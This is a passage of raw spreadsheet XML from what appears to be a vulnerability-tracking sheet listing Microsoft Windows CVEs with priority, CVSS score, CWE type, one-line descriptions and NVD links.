t="inlineStr"><is><t>NVD</t></is></c><c r="O472" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P472" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q472" s="5" t="inlineStr" /><c r="R472" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S472" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Storage Spaces Controller allows an authorized attacker to execute code locally.</t></is></c><c r="T472" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-68844</t></is></c></row><row r="473"><c r="A473" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B473" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C473" s="5" t="inlineStr"><is><t>CVE-2026-68845</t></is></c><c r="D473" s="5" t="n"><v>7.8</v></c><c r="E473" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F473" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G473" s="5" t="inlineStr" /><c r="H473" s="5" t="n"><v>0.003</v></c><c r="I473" s="5" t="inlineStr" /><c r="J473" s="5" t="inlineStr" /><c r="K473" s="5" t="inlineStr" /><c r="L473" s="5" t="inlineStr" /><c r="M473" s="5" t="inlineStr" /><c r="N473" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O473" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P473" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q473" s="5" t="inlineStr" /><c r="R473" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S473" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Program Compatibility Assistant Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T473" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-68845</t></is></c></row><row r="474"><c r="A474" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B474" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C474" s="5" t="inlineStr"><is><t>CVE-2026-68848</t></is></c><c r="D474" s="5" t="n"><v>7.8</v></c><c r="E474" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F474" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G474" s="5" t="inlineStr" /><c r="H474" s="5" t="n"><v>0.002</v></c><c r="I474" s="5" t="inlineStr" /><c r="J474" s="5" t="inlineStr" /><c r="K474" s="5" t="inlineStr" /><c r="L474" s="5" t="inlineStr" /><c r="M474" s="5" t="inlineStr" /><c r="N474" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O474" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P474" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q474" s="5" t="inlineStr" /><c r="R474" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S474" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Print Spooler Components allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T474" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-68848</t></is></c></row><row r="475"><c r="A475" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B475" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C475" s="5" t="inlineStr"><is><t>CVE-2026-68850</t></is></c><c r="D475" s="5" t="n"><v>7.8</v></c><c r="E475" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F475" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G475" s="5" t="inlineStr" /><c r="H475" s="5" t="n"><v>0.002</v></c><c r="I475" s="5" t="inlineStr" /><c r="J475" s="5" t="inlineStr" /><c r="K475" s="5" t="inlineStr" /><c r="L475" s="5" t="inlineStr" /><c r="M475" s="5" t="inlineStr" /><c r="N475" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O475" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P475" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q475" s="5" t="inlineStr" /><c r="R475" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S475" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Microsoft Account allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T475" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-68850</t></is></c></row><row r="476"><c r="A476" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B476" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C476" s="5" t="inlineStr"><is><t>CVE-2026-68875</t></is></c><c r="D476" s="5" t="n"><v>7.8</v></c><c r="E476" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F476" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G476" s="5" t="inlineStr" /><c r="H476" s="5" t="n"><v>0.002</v></c><c r="I476" s="5" t="inlineStr" /><c r="J476" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K47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6" s="5" t="inlineStr" /><c r="M476" s="5" t="inlineStr" /><c r="N476" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O476" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P476" s="5" t="inlineStr"><is><t>2026-09-14</t></is></c><c r="Q476" s="5" t="inlineStr" /><c r="R476" s="5" t="inlineStr"><is><t>CWE-126</t></is></c><c r="S476" s="5" t="inlineStr"><is><t>Buffer over-read in Windows NTFS allows an authorized attacker to execute code locally.</t></is></c><c r="T476" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-68875</t></is></c></row><row r="477"><c r="A477" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B477" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C477" s="5" t="inlineStr"><is><t>CVE-2026-68877</t></is></c><c r="D477" s="5" t="n"><v>7.8</v></c><c r="E477" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F477" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G477" s="5" t="inlineStr" /><c r="H477" s="5" t="n"><v>0.002</v></c><c r="I477" s="5" t="inlineStr" /><c r="J477" s="5" t="inlineStr" /><c r="K477" s="5" t="inlineStr" /><c r="L477" s="5" t="inlineStr" /><c r="M477" s="5" t="inlineStr" /><c r="N477" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O477" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P477" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q477" s="5" t="inlineStr" /><c r="R477" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S477" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Storage Spaces Controller allows an authorized attacker to execute code locally.</t></is></c><c r="T477" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-68877</t></is></c></row><row r="478"><c r="A478" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B478" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C478" s="5" t="inlineStr"><is><t>CVE-2026-68885</t></is></c><c r="D478" s="5" t="n"><v>7.8</v></c><c r="E478" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F478" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G478" s="5" t="inlineStr" /><c r="H478" s="5" t="n"><v>0.003</v></c><c r="I478" s="5" t="inlineStr" /><c r="J478" s="5" t="inlineStr" /><c r="K478" s="5" t="inlineStr" /><c r="L478" s="5" t="inlineStr" /><c r="M478" s="5" t="inlineStr" /><c r="N478" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O478" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P478" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q478" s="5" t="inlineStr" /><c r="R478" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S478" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Microsoft Standard XPS allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T478" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-68885</t></is></c></row><row r="479"><c r="A479" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B479" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C479" s="5" t="inlineStr"><is><t>CVE-2026-68888</t></is></c><c r="D479" s="5" t="n"><v>7.8</v></c><c r="E479" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F479" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G479" s="5" t="inlineStr" /><c r="H479" s="5" t="n"><v>0.003</v></c><c r="I479" s="5" t="inlineStr" /><c r="J479" s="5" t="inlineStr" /><c r="K479" s="5" t="inlineStr" /><c r="L479" s="5" t="inlineStr" /><c r="M479" s="5" t="inlineStr" /><c r="N479" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O479" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P479" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q479" s="5" t="inlineStr" /><c r="R479" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S479" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Microsoft Standard XPS allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T479" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-68888</t></is></c></row><row r="480"><c r="A480" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B480" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C480" s="5" t="inlineStr"><is><t>CVE-2026-68890</t></is></c><c r="D480" s="5" t="n"><v>7.8</v></c><c r="E480" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F480" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G480" s="5" t="inlineStr" /><c r="H480" s="5" t="n"><v>0.002</v></c><c r="I480" s="5" t="inlineStr" /><c r="J480" s="5" t="inlineStr" /><c r="K480" s="5" t="inlineStr" /><c r="L480" s="5" t="inlineStr" /><c r="M480" s="5" t="inlineStr" /><c r="N480" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O480" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P480" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q480" s="5" t="inlineStr" /><c r="R480" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S480" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Microsoft Standard XPS allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T480" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-68890</t></is></c></row><row r="481"><c r="A481" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B481" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C481" s="5" t="inlineStr"><is><t>CVE-2026-68892</t></is></c><c r="D481" s="5" t="n"><v>7.8</v></c><c r="E481" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F481" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G481" s="5" t="inlineStr" /><c r="H481" s="5" t="n"><v>0.002</v></c><c r="I481" s="5" t="inlineStr" /><c r="J481" s="5" t="inlineStr" /><c r="K481" s="5" t="inlineStr" /><c r="L481" s="5" t="inlineStr" /><c r="M481" s="5" t="inlineStr" /><c r="N481" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O481" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P481" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q481" s="5" t="inlineStr" /><c r="R481" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S481" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Microsoft Standard XPS allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T481" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-68892</t></is></c></row><row r="482"><c r="A482" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B482" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C482" s="5" t="inlineStr"><is><t>CVE-2026-68896</t></is></c><c r="D482" s="5" t="n"><v>7.8</v></c><c r="E482" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F482" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G482" s="5" t="inlineStr" /><c r="H482" s="5" t="n"><v>0.004</v></c><c r="I482" s="5" t="inlineStr" /><c r="J482" s="5" t="inlineStr" /><c r="K482" s="5" t="inlineStr" /><c r="L482" s="5" t="inlineStr" /><c r="M482" s="5" t="inlineStr" /><c r="N482" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O482" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P482" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q482" s="5" t="inlineStr" /><c r="R482" s="5" t="inlineStr"><is><t>CWE-36</t></is></c><c r="S482" s="5" t="inlineStr"><is><t>Absolute path traversal in Microsoft Windows Search Component allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T482" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-68896</t></is></c></row><row r="483"><c r="A483" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B483" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C483" s="5" t="inlineStr"><is><t>CVE-2026-69265</t></is></c><c r="D483" s="5" t="n"><v>7.8</v></c><c r="E483" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F483" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G483" s="5" t="inlineStr" /><c r="H483" s="5" t="n"><v>0.002</v></c><c r="I483" s="5" t="inlineStr" /><c r="J483" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K4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83" s="5" t="inlineStr" /><c r="M483" s="5" t="inlineStr" /><c r="N483" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O483" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P483" s="5" t="inlineStr"><is><t>2026-09-14</t></is></c><c r="Q483" s="5" t="inlineStr" /><c r="R483" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S483" s="5" t="inlineStr"><is><t>Out-of-bounds read in Windows NTFS allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T483" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69265</t></is></c></row><row r="484"><c r="A484" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B484" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C484" s="5" t="inlineStr"><is><t>CVE-2026-69269</t></is></c><c r="D484" s="5" t="n"><v>7.8</v></c><c r="E484" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F484" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G484" s="5" t="inlineStr" /><c r="H484" s="5" t="n"><v>0.003</v></c><c r="I484" s="5" t="inlineStr" /><c r="J484" s="5" t="inlineStr" /><c r="K484" s="5" t="inlineStr" /><c r="L484" s="5" t="inlineStr" /><c r="M484" s="5" t="inlineStr" /><c r="N484" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O484" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P484" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q484" s="5" t="inlineStr" /><c r="R484" s="5" t="inlineStr"><is><t>CWE-191</t></is></c><c r="S484" s="5" t="inlineStr"><is><t>Integer underflow (wrap or wraparound) in Microsoft Standard XPS allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T484" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69269</t></is></c></row><row r="485"><c r="A485" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B485" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C485" s="5" t="inlineStr"><is><t>CVE-2026-69270</t></is></c><c r="D485" s="5" t="n"><v>7.8</v></c><c r="E485" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F485" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G485" s="5" t="inlineStr" /><c r="H485" s="5" t="n"><v>0.002</v></c><c r="I485" s="5" t="inlineStr" /><c r="J485" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K4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85" s="5" t="inlineStr" /><c r="M485" s="5" t="inlineStr" /><c r="N485" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O485" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P485" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q485" s="5" t="inlineStr" /><c r="R485" s="5" t="inlineStr"><is><t>CWE-122, CWE-20</t></is></c><c r="S485" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows USB Audio Class driver (usbaudio.sys) allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T485" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69270</t></is></c></row><row r="486"><c r="A486" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B486" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C486" s="5" t="inlineStr"><is><t>CVE-2026-69277</t></is></c><c r="D486" s="5" t="n"><v>7.8</v></c><c r="E486" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F486" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G486" s="5" t="inlineStr" /><c r="H486" s="5" t="n"><v>0.003</v></c><c r="I486" s="5" t="inlineStr" /><c r="J486" s="5" t="inlineStr" /><c r="K486" s="5" t="inlineStr" /><c r="L486" s="5" t="inlineStr" /><c r="M486" s="5" t="inlineStr" /><c r="N486" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O486" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P486" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q486" s="5" t="inlineStr" /><c r="R486" s="5" t="inlineStr"><is><t>CWE-121</t></is></c><c r="S486" s="5" t="inlineStr"><is><t>Stack-based buffer overflow in Microsoft Local Security Authority Server (lsasrv) allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T486" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69277</t></is></c></row><row r="487"><c r="A487" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B487" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C487" s="5" t="inlineStr"><is><t>CVE-2026-69283</t></is></c><c r="D487" s="5" t="n"><v>7.8</v></c><c r="E487" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F487" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G487" s="5" t="inlineStr" /><c r="H487" s="5" t="n"><v>0.002</v></c><c r="I487" s="5" t="inlineStr" /><c r="J487" s="5" t="inlineStr" /><c r="K487" s="5" t="inlineStr" /><c r="L487" s="5" t="inlineStr" /><c r="M487" s="5" t="inlineStr" /><c r="N487" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O487" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P487" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q487" s="5" t="inlineStr" /><c r="R487" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S487" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows CD-ROM Driver allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T487" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69283</t></is></c></row><row r="488"><c r="A488" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B488" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C488" s="5" t="inlineStr"><is><t>CVE-2026-69284</t></is></c><c r="D488" s="5" t="n"><v>7.8</v></c><c r="E488" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F488" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G488" s="5" t="inlineStr" /><c r="H488" s="5" t="n"><v>0.002</v></c><c r="I488" s="5" t="inlineStr" /><c r="J488" s="5" t="inlineStr" /><c r="K488" s="5" t="inlineStr" /><c r="L488" s="5" t="inlineStr" /><c r="M488" s="5" t="inlineStr" /><c r="N488" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O488" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P488" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q488" s="5" t="inlineStr" /><c r="R488" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S488" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows DCOM Server allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T488" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69284</t></is></c></row><row r="489"><c r="A489" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B489" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C489" s="5" t="inlineStr"><is><t>CVE-2026-69289</t></is></c><c r="D489" s="5" t="n"><v>7.8</v></c><c r="E489" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F489" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G489" s="5" t="inlineStr" /><c r="H489" s="5" t="n"><v>0.004</v></c><c r="I489" s="5" t="inlineStr" /><c r="J489" s="5" t="inlineStr" /><c r="K489" s="5" t="inlineStr" /><c r="L489" s="5" t="inlineStr" /><c r="M489" s="5" t="inlineStr" /><c r="N489" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O489" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P489" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q489" s="5" t="inlineStr" /><c r="R489" s="5" t="inlineStr"><is><t>CWE-59</t></is></c><c r="S489" s="5" t="inlineStr"><is><t>Improper link resolution before file access ('link following') in Windows Setup Files Cleanup allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T489" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69289</t></is></c></row><row r="490"><c r="A490" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B490" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C490" s="5" t="inlineStr"><is><t>CVE-2026-69290</t></is></c><c r="D490" s="5" t="n"><v>7.8</v></c><c r="E490" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F490" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G490" s="5" t="inlineStr" /><c r="H490" s="5" t="n"><v>0.002</v></c><c r="I490" s="5" t="inlineStr" /><c r="J490" s="5" t="inlineStr" /><c r="K490" s="5" t="inlineStr" /><c r="L490" s="5" t="inlineStr" /><c r="M490" s="5" t="inlineStr" /><c r="N490" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O490" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P490" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q490" s="5" t="inlineStr" /><c r="R490" s="5" t="inlineStr"><is><t>CWE-121</t></is></c><c r="S490" s="5" t="inlineStr"><is><t>Stack-based buffer overflow in Windows Storage Spaces Controller allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T490" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69290</t></is></c></row><row r="491"><c r="A491" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B491" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C491" s="5" t="inlineStr"><is><t>CVE-2026-69293</t></is></c><c r="D491" s="5" t="n"><v>7.8</v></c><c r="E491" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F491" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G491" s="5" t="inlineStr" /><c r="H491" s="5" t="n"><v>0.002</v></c><c r="I491" s="5" t="inlineStr" /><c r="J491" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K4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1" s="5" t="inlineStr" /><c r="M491" s="5" t="inlineStr" /><c r="N491" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O491" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P491" s="5" t="inlineStr"><is><t>2026-09-14</t></is></c><c r="Q491" s="5" t="inlineStr" /><c r="R491" s="5" t="inlineStr"><is><t>CWE-122, CWE-20</t></is></c><c r="S491" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T491" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69293</t></is></c></row><row r="492"><c r="A492" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B492" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C492" s="5" t="inlineStr"><is><t>CVE-2026-69295</t></is></c><c r="D492" s="5" t="n"><v>7.8</v></c><c r="E492" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F492" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G492" s="5" t="inlineStr" /><c r="H492" s="5" t="n"><v>0.003</v></c><c r="I492" s="5" t="inlineStr" /><c r="J492" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K49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2" s="5" t="inlineStr" /><c r="M492" s="5" t="inlineStr" /><c r="N492" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O492" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P492" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q492" s="5" t="inlineStr" /><c r="R492" s="5" t="inlineStr"><is><t>CWE-125, CWE-20</t></is></c><c r="S492" s="5" t="inlineStr"><is><t>Out-of-bounds read in Windows USB Driver allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T492" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69295</t></is></c></row><row r="493"><c r="A493" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B493" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C493" s="5" t="inlineStr"><is><t>CVE-2026-69298</t></is></c><c r="D493" s="5" t="n"><v>7.8</v></c><c r="E493" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F493" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G493" s="5" t="inlineStr" /><c r="H493" s="5" t="n"><v>0.003</v></c><c r="I493" s="5" t="inlineStr" /><c r="J493" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K49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3" s="5" t="inlineStr" /><c r="M493" s="5" t="inlineStr" /><c r="N493" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O493" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P493" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q493" s="5" t="inlineStr" /><c r="R493" s="5" t="inlineStr"><is><t>CWE-190</t></is></c><c r="S493" s="5" t="inlineStr"><is><t>Integer overflow or wraparound in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T493" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69298</t></is></c></row><row r="494"><c r="A494" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B494" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C494" s="5" t="inlineStr"><is><t>CVE-2026-69307</t></is></c><c r="D494" s="5" t="n"><v>7.8</v></c><c r="E494" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F494" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G494" s="5" t="inlineStr" /><c r="H494" s="5" t="n"><v>0.003</v></c><c r="I494" s="5" t="inlineStr" /><c r="J494" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K4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4" s="5" t="inlineStr" /><c r="M494" s="5" t="inlineStr" /><c r="N494" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O494" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P494" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q494" s="5" t="inlineStr" /><c r="R494" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S494" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows USB Audio Class driver (usbaudio.sys) allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T494" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69307</t></is></c></row><row r="495"><c r="A495" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B495" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C495" s="5" t="inlineStr"><is><t>CVE-2026-69312</t></is></c><c r="D495" s="5" t="n"><v>7.8</v></c><c r="E495" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F495" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G495" s="5" t="inlineStr" /><c r="H495" s="5" t="n"><v>0.003</v></c><c r="I495" s="5" t="inlineStr" /><c r="J495" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K4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5" s="5" t="inlineStr" /><c r="M495" s="5" t="inlineStr" /><c r="N495" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O495" 